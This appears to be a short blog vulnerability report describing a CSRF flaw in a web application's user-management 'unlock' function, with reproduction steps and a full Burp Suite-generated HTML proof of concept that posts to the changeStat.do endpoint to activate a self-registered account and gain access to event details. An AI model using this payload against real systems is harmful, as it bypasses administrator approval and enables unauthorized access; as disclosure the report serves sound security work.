该博客介绍了如何通过CSRF(跨站请求伪造)漏洞来改变用户在系统中的状态。用户可以自行注册,但需管理员更改状态后才能登录。攻击者可捕获解锁用户的网络包,生成CSRF poc,提交后成功改变用户状态为正常,从而获取所有事件详情。
Users can register by themselves, but the administrator needs to change the user status before they can log in. After using the CSRF vulnerability to change the status, you can view the details of all events.
1. Click on the system configuration in the upper right corner, click on user management, click on the unlock button
2. Use burpSuit to capture packets, and then generate CSRF poc
3. Will return true after success
POC: Change user status
After the administrator logged in, open the following page
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/cynthia_war/user/changeStat.do" method="POST">
<input type="hidden" name="user" value="vq2lumok@qq.com" />
<input type="hidden" name="status" value="normal" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
中国移动通信集团广西有限公司
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
